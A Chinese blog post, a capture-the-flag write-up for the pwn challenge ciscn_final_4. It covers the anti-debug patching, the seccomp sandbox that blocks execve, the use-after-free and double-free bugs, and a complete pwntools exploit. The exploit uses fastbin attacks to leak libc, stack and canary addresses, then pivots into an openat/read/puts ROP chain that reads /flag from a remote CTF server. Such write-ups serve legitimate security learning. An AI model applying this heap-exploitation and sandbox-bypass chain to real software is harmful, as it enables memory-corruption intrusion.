沙盒禁用+堆栈结合+反调试-ciscn_final_4

最新推荐文章于 2024-04-28 09:18:28 发布
最新推荐文章于 2024-04-28 09:18:28 发布
阅读量450 收藏
点赞数
分类专栏: pwn题目 文章标签: pwn glibc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/123716946
版权

这题比较好玩题目采用了沙盒禁用+堆栈结合+反调试

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XgvNWTQj-1648114290498)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321180919410.png)]

分析

main函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3yORn4pt-1648114290499)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181259075.png)]

watch函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CzgszWKW-1648114290499)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181326677.png)]

结合我的注释看,这题是有反调试的,所以就我们在本地打的时候可以将这文件的反调试部分就nop掉,之前会一点点逆向的题,所以也没耗多少时间,具体nop手法看我的另一篇文章[链接]:121312

nop后的main函数:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nh2D1iu0-1648114290500)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181854022.png)]

new函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0JADfctq-1648114290501)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181930900.png)]在这里插入图片描述

mwrite函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lJlXl3fF-1648114290502)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321181950226.png)]

delete函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jX9HNIec-1648114290504)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321182004515.png)]

总结:

  1. add函数可以malloc 32次
  2. 有打印堆数据函数
  3. delete函数有uaf漏洞
  4. 运行程序后说不能执行系统调用(嗯~)之前没遇到过看了下大佬文章说是沙箱禁用了execve

所以pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只能采取openat/read/puts的组合方式来读取flag

实现沙盒机制方式:1.prctl函数调用,2.seccomp库函数。 详细解答看这篇文章->安全客

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nllbqlSC-1648114290506)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321183027000.png)]

那么具体禁用了哪些系统调用可以通过seccomp-tools工具 ->> gitbhu 这题的系统调用禁用如图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rMxsR6cn-1648114290507)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321183612246.png)]

可以看到没有禁用 open,write,read,但是我实战的时候open函数用不了,只能用openat函数

思路

这题在用之前对gdb的pwntools不是特别会使用,所以做题过程浪费很多时间,工具使用网上也不是很好去搜索,所以这里尽量记录一下使用技巧

  1. 因为这题有打印堆函数,所以可以很方便的泄漏libc
  2. 然后通过使用double free漏洞进行fast attack攻击堆分配到note_size处(bss : 0x602040-0x6020c0),因为note_size就是我们new函数填入的size,是一个可控区域那么就可以伪造fake chunk,然后将__environ指针写入到note区域进行栈地址泄漏
  3. 有了栈地址就可以通过fast attack攻击堆分配到stack空间了,然后就是泄漏canary,最后构造ROP(open-write-printf)

ok~

简单的泄漏libc套路

    sla('\n',b'M'*0xf0 + p64(0x70)) #用于后面在栈上fakechunk
#-----------------------leak libc address-------------------------------
    add(0x68,'1')#用于fastbin attack
    add(0x68,'2') #用于fastbin attack
    add(0xf0,'3') #leak libc
    add(0x68,'4')
    add(0x68,'5')
    add(0x68,'6')
    add(0x78,'7') #用于在bss中伪造fast chunk->size(0x78)
    dele(2) #unsort bin
    show(2)
    ru('\n')
    libc.address = info(rc(6),'libc') - (0x7f49ca2dcb78 - 0x7f49c9f18000)

再通过fastbin attack分配堆到bss的指针处进行栈地址泄漏

#-----------------------leak stack address-------------------------------
    dele(1) #double free
    dele(0)
    dele(1)
    fake = 0x602050
    add(0x68,p64(fake)) # fastbin attack
    add(0x68)
    add(0x68)
    add(0x68,p8(0)*0x60 + p64(libc.symbols['__environ'])) #在note处写入堆指针
    show(0)
    ru('\n')
    stack = info(rc(6),'stack')

有了栈地址同样就可以fastbin attck到栈处,进行canary泄漏

#-----------------------attack into stack-------------------------------
    dele(3) #double free
    dele(4)
    dele(3)
    fake = stack - 0x120
    add(0x68,p64(fake)) # fastbin attack
    add(0x68)
    add(0x68)
    add(0x68,b'A'*0x11) #这里pase停下来后栈空间是显示的IO_stdout的栈,可以手动设置在输入content前停下来看看栈空间分布情况,当然也可手动断点在这里查看调试
    show(14)
    ru('\n')
    ru('A'*0x11)
    canary = info(b'\x00' + rc(7),'canary')

因为开局分析了,这题是通过open-read-puts方式进行读取flag,现在有了libc就可以很方便的构造ropgadget链条了,但是因为我们用fastbin attck方式写入栈数据的长度有限,那么就需要在多处构造这个rop,首先是第一个gadget如下:(这个gadget是在main函数栈空间里面,实现了伪造的read函数调用,且写入数据到指定栈地址)

#-----------------------make rop-------------------------------
#这段rop用于后面跳转到这里,事先布置好
    dele(3) #double free
    dele(4)
    dele(3)
    fake = stack - 0x120
    add(0x68,p64(fake)) # fastbin attack main函数栈空间处
    add(0x68)
    add(0x68)
    prdi = libc.address + 0x0000000000021102
    prsi = libc.address + 0x00000000000202e8
    prdx = libc.address + 0x0000000000001b92
    ropgad = p64(prdi) + p64(0)
    ropgad += p64(prsi) + p64(fake+0x55-0xd)
    ropgad += p64(prdx) + p64(0x999)
    ropgad += p64(libc.symbols['read'])# + p64(fake+0x55)
    add(0x68,ropgad)

上面在main函数栈中写入了gadget,因为main函数是个死循环不会走ret指令,所以我们可以将堆分配到new函数的栈空间然后再调整rsp的值跳转到mian函数栈空间里的gadget

#-----------------------make new() rop-------------------------------
#因为main函数是个死循环不会走ret指令,所以这里在new函数构造rop然后再跳到我们上面布置的ropgad处
    add(0x38)
    add(0x38)
    dele(2) #double free
    dele(20)
    dele(2)
    rop_addr = fake
    fake = fake - (0x7ffd7aeb1e28-0x7ffd7aeb1d02)
    add(0x38,p64(fake)) # fastbin attack 到new函数的栈空间处 构造rop
    add(0x38)
    add(0x38)
    #通过计算0x7fff66d5cbf8-0x7fff66d5cae8 = 0x110(new函数栈rsp地址 - 前面ropgad_addr栈地址)
    add_rsp = libc.address + 0x00000000000359dc # add rsp, 0x108 ; ret
    logs(rop_addr)
    #z('b *0x400B91 \n c')
    add(0x38,p8(0)*6 + p64(canary) + p64(0) + p64(add_rsp))  #从new函数结束后ret到前面我们在main函数布置的ropgad处
    #这里的rop跳转方式不同于平常的跳到指定程序地址,这里是要跳到指定栈空间所以是调整rsp的位置

经过上面一步后我们的程序执行流就到了main函数栈空间里面了,那就是我们伪造的read函数,那么就可以完成我们最后一步的ropgadget读取到flag了

    #经过上面布置的ropgad现在就可以执行我们布置的read函数了
    buf = 0x602038
    flag_addr = rop_addr + 0x90 + 0x48 #指向我下面payload输入的·/flag\x00·处
    #payload = p64(prdi) + p64(flag_addr)
    #payload += p64(prsi)+ p64(0)
    #payload += p64(libc.symbols['open']) #亲测用不了

    payload = p64(prdi) + p64(0)
    payload += p64(prsi)+ p64(flag_addr)
    payload += p64(prdx)+ p64(0)
    payload += p64(libc.symbols['openat'])#使用这个函数就需要输入绝对路径的文件路径

    payload += p64(prdi) + p64(0x3)
    payload += p64(prsi)+ p64(buf)
    payload += p64(prdx)+ p64(100)
    payload += p64(libc.symbols['read'])
    payload += p64(prdi) + p64(buf)
    payload += p64(libc.symbols['puts']) + p64(0x400F6D) +b'/flag\x00' #根目录下的flag文件
    sl(payload)

其中上面的伪造的具体栈地址偏移需要gdb手动去调试

在做题过程中gdb调试,比如想看new函数的栈空间情况,因为new函数调用次数比较多用设断点方式去一步步跟很蠢,那么就可以在你要停的那次函数前面gdb.attach()如图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0RNMxpjs-1648114290508)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220322134903856.png)]

以前不知道,总是习惯性的把gdb.attach放在前面了,然后手动的一直c、c、c。。。

完整exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
#import sys

#context.terminal = ['terminator', '-x', 'sh', '-c']
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

#binary = "./ciscn_final_4-debug"
binary = "./ciscn_final_4"

one = [0x45216,0x4526a,0xf02a4,0xf1147]  #2.23(64)
#idx = int(sys.argv[1])

global p
local = 0
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("node4.buuoj.cn","28506")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

################################ Condfig ############################################
sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
it = lambda :p.interactive()

def z(s='b main'):
    gdb.attach(p,s)

def logs(mallocr,string='logs'):
    if(isinstance(mallocr,int)):
       print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,mallocr))
    else:
       print('\033[1;31;40m%20s-->%s\033[0m'%(string,mallocr))

def pa(s=1,t='step'):
    log.success('pause : '+ t +'---> '+str(hex(s)))
    pause()

def info(data,key='info',bit=64):
    if(bit == 64):
      leak = u64(data.ljust(8, b'\0'))
    else:
      leak = u32(data.ljust(4, b'\0'))
    logs(leak,key)
    return leak

################################ Function ############################################
def add(s,c = 'A',p=0):
    sla('>> ','1')
    sla('size?',str(s))
    if p :
        pa()
    sa('content?',c)
def dele(i):
    sla('>> ','2')
    sla('index ?',str(i))
def show(i):
    sla('>> ','3')
    sla('index ?',str(i))
################################### Statr ############################################
def pwn():
    sla('\n',b'M'*0xf0 + p64(0x70)) #用于后面在栈上fakechunk
#-----------------------leak libc address-------------------------------
    add(0x68,'1')#用于fastbin attack
    add(0x68,'2') #用于fastbin attack
    add(0xf0,'3') #leak libc
    add(0x68,'4')
    add(0x68,'5')
    add(0x68,'6')
    add(0x78,'7') #用于在bss中伪造fast chunk->size(0x78)
    dele(2) #unsort bin
    show(2)
    ru('\n')
    libc.address = info(rc(6),'libc') - (0x7f49ca2dcb78 - 0x7f49c9f18000)
#-----------------------leak stack address-------------------------------
    dele(1) #double free
    dele(0)
    dele(1)
    fake = 0x602050
    add(0x68,p64(fake)) # fastbin attack
    add(0x68)
    add(0x68)
    add(0x68,p8(0)*0x60 + p64(libc.symbols['__environ'])) #在note处写入堆指针
    show(0)
    ru('\n')
    stack = info(rc(6),'stack')
#-----------------------attack into stack-------------------------------
    dele(3) #double free
    dele(4)
    dele(3)
    fake = stack - 0x120
    add(0x68,p64(fake)) # fastbin attack
    add(0x68)
    add(0x68)
    add(0x68,b'A'*0x11) #这里pase停下来后栈空间是显示的IO_stdout的栈,可以手动设置在输入content前停下来看看栈空间分布情况,当然也可手动断点在这里查看调试
    show(14)
    ru('\n')
    ru('A'*0x11)
    canary = info(b'\x00' + rc(7),'canary')
#-----------------------make rop-------------------------------
#这段rop用于后面跳转到这里,事先布置好
    dele(3) #double free
    dele(4)
    dele(3)
    fake = stack - 0x120
    add(0x68,p64(fake)) # fastbin attack main函数栈空间处
    add(0x68)
    add(0x68)
    prdi = libc.address + 0x0000000000021102
    prsi = libc.address + 0x00000000000202e8
    prdx = libc.address + 0x0000000000001b92
    ropgad = p64(prdi) + p64(0)
    ropgad += p64(prsi) + p64(fake+0x55-0xd)
    ropgad += p64(prdx) + p64(0x999)
    ropgad += p64(libc.symbols['read'])# + p64(fake+0x55)
    add(0x68,ropgad)
#-----------------------make new() rop-------------------------------
#因为main函数是个死循环不会走ret指令,所以这里在new函数构造rop然后再跳到我们上面布置的ropgad处
    add(0x38)
    add(0x38)
    dele(2) #double free
    dele(20)
    dele(2)
    rop_addr = fake
    fake = fake - (0x7ffd7aeb1e28-0x7ffd7aeb1d02)
    add(0x38,p64(fake)) # fastbin attack 到new函数的栈空间处 构造rop
    add(0x38)
    add(0x38)
    #通过计算0x7fff66d5cbf8-0x7fff66d5cae8 = 0x110(new函数栈rsp地址 - 前面ropgad_addr栈地址)
    add_rsp = libc.address + 0x00000000000359dc # add rsp, 0x108 ; ret
    logs(rop_addr)
    #z('b *0x400B91 \n c')
    add(0x38,p8(0)*6 + p64(canary) + p64(0) + p64(add_rsp))  #从new函数结束后ret到前面我们在main函数布置的ropgad处
    #这里的rop跳转方式不同于平常的跳到指定程序地址,这里是要跳到指定栈空间所以是调整rsp的位置

    #经过上面布置的ropgad现在就可以执行我们布置的read函数了
    buf = 0x602038
    flag_addr = rop_addr + 0x90 + 0x48
    #payload = p64(prdi) + p64(flag_addr)
    #payload += p64(prsi)+ p64(0)
    #payload += p64(libc.symbols['open'])

    payload = p64(prdi) + p64(0)
    payload += p64(prsi)+ p64(flag_addr)
    payload += p64(prdx)+ p64(0)
    payload += p64(libc.symbols['openat'])

    payload += p64(prdi) + p64(0x3)
    payload += p64(prsi)+ p64(buf)
    payload += p64(prdx)+ p64(100)
    payload += p64(libc.symbols['read'])
    payload += p64(prdi) + p64(buf)
    payload += p64(libc.symbols['puts']) + p64(0x400F6D) +b'/flag\x00'
    sl(payload)
    p.interactive()
################################### End ##############################################
pwn()

打远程截图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z5BZLBOz-1648114290509)(沙盒禁用+堆栈结合+反调试-ciscn_final_4.assets/image-20220321180547649.png)]

HNHuangJingYu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 378
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
Java常见面试题 + 答案
weixin_46668960的博客
02-20 1700
Java常见面试题 + 答案一、Java 基础二、容器三、多线程射五、对象拷贝Java Web 一、Java 基础 1.JDK 和 JRE 有什么区别? JDK:Java Development Kit 的简称,java 开发工具包,提供了 java 的开发环境和运行环境。 JRE:Java Runtime Environment 的简称,java 运行环境,为 java 的运行提供了所需环境。 具体来说 JDK 其实包含了 JRE,同时还包含了编译 java 源码的编译器javac,还包含了很多 jav
ciscn_final_4(调试+在栈上伪造堆chunk)
seaaseesa的博客
04-30 1154
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在栈里输入一些数据,因此,我们可以在栈里伪造一个chunk,然后利用fa...
沙盒禁用+tcache
csdn546229768的博客
05-25 916
题目 2021全国大学生信息安全竞赛-ciscn_2021_silverwolf 保护 $ checksec silverwolf [*] '/home/hnhuangjingyu/sliverwolf_my/silverwolf' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FO
(BUUCTF) ciscn_2019_final_4
xy1458214551的博客
11-28 66
buuctf上的ciscn_2019_final_4题解
第二篇:sendbox\od等逆向检测手段
weixin_46108571的博客
11-17 686
此期为学习记录第二期:逆向工程,想看看我的第一期的BYPASS篇可以到我的个人主页里面看看 写在开头,此系列文章全部属于教育和经验交流,请勿用于非法用途!!! 了解沙箱 沙箱是一种按照安全策略限制程序行为的执行环境。早期主要用于测试可疑软件等,比如黑客们为了试用某种病毒或者不安全产品,往往可以将它们在沙箱环境中运行。经典的沙箱系统的实现途径一般是通过拦截系统调用,监视程序行为,然后依据用户定义的策略来控制和限制程序对计算机资源的使用,比如改写注册表,读写磁盘等. 我常用的网络沙箱:微步在线云沙箱、Vi
梦想成真---jdk版本的选择(推荐1.8)
weixin_41563161的博客
12-29 3009
1.序 2020/3/17日JDK14正式发版,但是现在大部分公司还是在使用jdk 8。所以我们今天继续聊聊jdk8。 2.jdk8 详解 2.1编程语言 2.1.1Lambda 表达式 Lambda 允许把函数作为一个方法的参数(函数作为参数传递到方法中)。 举个例子 // Java 8之前: new Thread(new Runnable() { @Override public void run() { System.out.println("Before Java8");
Java面试宝典(超级详细)
m0_67402588的博客
08-01 1471
=对于基本类型来说是值比较,对于引用类型来说是比较的是引用;而equals默认情况下是引用比较,只是很多类重新了equals方法,比如String、Integer等把它变成了值比较,所以一般情况下equals比较的是值是否相等。...
java面试100题(应届生必备)
m0_66557301的博客
06-24 1万+
具体来说 JDK 其实包含了 JRE,同时还包含了编译 java 源码的编译器 javac,还包含了很多 java 程序调试和分析的工具。简单来说:如果你需要运行 java 程序,只需安装 JRE 就可以了,如果你需要编写 java 程序,需要安装 JDK。== 解读对于基本类型和引用类型 == 的作用效果是不同的,如下所示:代码示例: 代码解读:因为 x 和 y 指向的是同一个引用,所以 == 也是 true,而 new String()方法则重写开辟了内存空间,所以 == 结果为 false,而 equ
android调试之父子调试
weixin_34349320的博客
05-03 184
普通进程调试进程源码: #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #include <sys/prctl.h> #include <sys/types.h> #include <sys/wait.h&gt...
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 392
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
xyctf Pwn WP
最新发布
qq_74026216的博客
04-28 959
利用jmp 短跳转 连接shellcode,用3个pop rsi 把栈中的0x114514000赋值给rsi ,syscall调用read写入sh。libc-2.35 add 存在溢出,将堆指针放在下一个chunk的prev_size中 ,chunk_list 指针free后未置0。思路:伪造chunk 造成堆块重叠,tcache bin attack 分配chunk到gift为system(/bin/sh)静态链接 ,栈溢出 ,mprotect改权限,打shellcode。
2021 蓝帽杯 pwn slient
weixin_51298357的博客
04-29 913
2021 蓝帽杯 pwn slient 这道题不是第一个上的pwn题,第一道太难了,第二个一出来就去看第二个题了= = 一个沙箱绕过的题,以前没写过类似的,当场也没有写出来,于是复现一下。 前置知识 seccomp概述 restrict模式:SECCOMP_SET_MODE_STRICT 白名单:read,write,_exit,sigreturn 除了已经打开的文件描述符和允许的系统调用,如果发起其他系统调用,内核会使用SIGKILL或SIGSYS终止进程 filter模式:SECCOMP
orw--libc
fuiifiuiii的博客
07-08 281
栈上的orw,十分易学,适合刚刚接触orw的小伙伴·
栈迁移图解
qq_40410406的博客
11-11 1500
栈迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp栈空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行栈溢出攻击,所以需要另寻出路。 2 栈溢出长度不足以使用直接 ROP 3 栈溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了栈不可执行保护,就需要栈迁移到bss段或者data段或者其他栈位置执行我们的gadge
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1049
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
prctl()函数应用
thinkinwm的专栏
03-25 2519
int prctl(int option,unsigned longarg2,unsigned long arg3,unsigned long arg4,unsigned long arg5) 这个系统调用指令是为进程制定而设计的,明确的选择取决于option: PR_GET_PDEATHSIG :返回处理器信号;   PR_SET_PDEATHSIG :arg2作为处理器
解决Android加固多进程ptrace调试的思路整理
热门推荐
Fly20141201. 的专栏
12-13 1万+
一、Android多进程调试的原理代码 当ptrace附加目标进程时出现失败,正常情况下有理由认为目标进程已经被别的进程ptrace附加了。像梆梆加固就是采用的这种调试的手法,效果还是不错的。 /****************************************************** // 附加目标进程失败,说明目标进程已经被调试 if (ptrace(PTRAC
linux c用prctl给线程命名
云守护的专栏
01-19 2879
#include #include #include void* tmain(void * arg) { printf("tmain\n") ; char name[ 32] ; prctl(PR_SET_NAME, (unsigned long) "thread_name" ) ; prctl(PR_GET_NAME,
ubuntu下载微信时,用了sudo apt-get install -f -y ./ukylin-wine_70.6.3.25_amd64.deb sudo apt-get install -f -y ./ukylin-wechat_3.0.0_amd64.deb。这两段代码。出现报错:N: 由于文件'/home/du/Downloads/ukylin-wechat_3.0.0_amd64.deb'无法被用户'_apt'访问,已脱离沙盒并提权为根用户来进行下载。 - pkgAcquire::Run (13: 权限不够)
06-08
这个报错的意思是由于你当前的用户没有权限访问下载的文件,所以无法安装。你需要使用管理员权限来安装这两个包。可以尝试使用以下命令来安装微信: ``` sudo dpkg -i ukylin-wine_70.6.3.25_amd64.deb ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值